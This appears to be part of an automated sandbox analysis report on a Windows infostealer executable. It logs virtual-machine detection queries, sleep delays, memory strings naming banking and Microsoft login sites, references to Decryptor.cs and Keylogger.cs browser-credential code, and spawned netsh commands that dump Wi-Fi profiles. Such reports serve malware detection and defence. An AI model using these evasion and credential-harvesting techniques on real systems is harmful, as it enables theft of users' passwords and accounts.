Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Memory allocated: 1D836A60000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Memory allocated: 1D850430000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595258	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595121	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595015	Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Window / User API: threadDelayed 6776			Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Window / User API: threadDelayed 2958			Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -200000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99200s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99093s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98983s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98869s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98724s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -98061s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -595500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -595390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -595258s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -595121s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99849s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99731s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99490s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe TID: 3724	Thread sleep time: -99374s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99200	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98983	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98869	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98724	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98607	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98500	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98390	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98171	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 98061	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595500	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595258	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595121	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99849	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99731	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99609	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99490	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Thread delayed: delay time: 99374	Jump to behavior

Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: uyz4YPUyc9.exe, 00000000.00000002.2306910614.000001D8367F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: uyz4YPUyc9.exe, 00000000.00000002.2307463800.000001D838260000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware svga 3d
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838AEC000.00000004.00000800.00020000.00000000.sdmp, Info.txt.0.dr	Binary or memory string: VirtualMachine: False
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: uyz4YPUyc9.exe	Binary or memory string: VirtualMachine:
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: IVHSHTCODI.pdf3.0.dr	Binary or memory string: IVHSHTCODIPNTGBCHMNVKPUAILXVVKFKXVQUNCFXTBCMTEBSWXPFTMDSDGZKIAUVKOEHSXZJBPMNMGEXTJPAOEMDPTHXRQCVOULRHOXNLLEVOYSUUHJKHUBLKPVUBOWNNNYIVERGXUJXWHARSIBRHIALJWVNJGCJFSWTYNFAKHFKMWIXKIPPQTBKLVLJABTXJJAUPFFIWTLSIBHYUFUKBTZFKZOHSTUPFMPQIOKLVDQRVIJQOGXFVCXVTHXYBRKEFKTAYEVEEJSDTODNKYUKIFEJTGSCOFEGJFXUFFTUDUGNPSDSFNCYGRUOKLHTZSRYLVFROHKDEBPBTMLYGSXGAHMMJCCAHNNTHTJYHYJSYCEYHNZYLYPZZRKQCBEKCIJOMVDKLIMUKHNBXCTWEOWAPIZLIROXKDWVWPAJXRXLLBZPLBODFKBOAAIGTICFSLICMIRMFQVAOXHGTZBMVNEYHPFMVMCIZMYUKDQAJPPKRYFMFYBBZZUDRZUAXHAETNILYTWGZWXKMVYVQPTHACYZNPNUTFPXHLZGFMCFPKGKXZBEMNDEMMSUCIJVEEZVVTNLALWSOOIQWNDNBYFXIMXSYSGIHDKBLTQNHGZBSABJNNCDWHLHGGLULQOHIPDWXBOSOZDGSJICPXZOMIEHQNITIKIXBHUHPYBVDEESQCONQTQTGDIDHFZLNHGHGBNMCJMHPFYAEFORSGPQVZXVNVTODPAYYBGVVJXOQSOXDEYRXFEQHHZXPIKKKAYEDXYKYANMXDXCYRRYSRYIHJTRQILRXNGCFCDERRCTAPDWXXOUTNWBDGRIXGZFWOPASEDDSDMQOIHQDMFZFHVAKVPOTYYQXENYUVBZWKYSVATRNDKTBQJKCBIUQOGVVRSKQRXEZOQAFWIQOTGVRLVGJCXQRXZRDCAHGTXVJAEUKUYANEGPRLWIUCPMSVVQZZMIBQKJKZRROZREPQAHYLRVAFUIGNUGSAQAMAZEHHGHFNSBQQBZOSFYEVJOWSCRJNDOYFYNDGPN
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838502000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA 3D
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D838502000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Video
Source: uyz4YPUyc9.exe, 00000000.00000002.2313534561.000001D850DFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e696&d
Source: uyz4YPUyc9.exe	Binary or memory string: vmware
Source: uyz4YPUyc9.exe	Binary or memory string: vmicshutdown
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: uyz4YPUyc9.exe, 00000000.00000002.2313534561.000001D850DBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: uyz4YPUyc9.exe	Binary or memory string: vmicvss
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: uyz4YPUyc9.exe	Binary or memory string: vmicheartbeat
Source: tmpE2A3.tmp.dat.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: uyz4YPUyc9.exe, Decryptor.cs	Reference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
Source: uyz4YPUyc9.exe, Decryptor.cs	Reference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
Source: uyz4YPUyc9.exe, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 5276	Jump to behavior
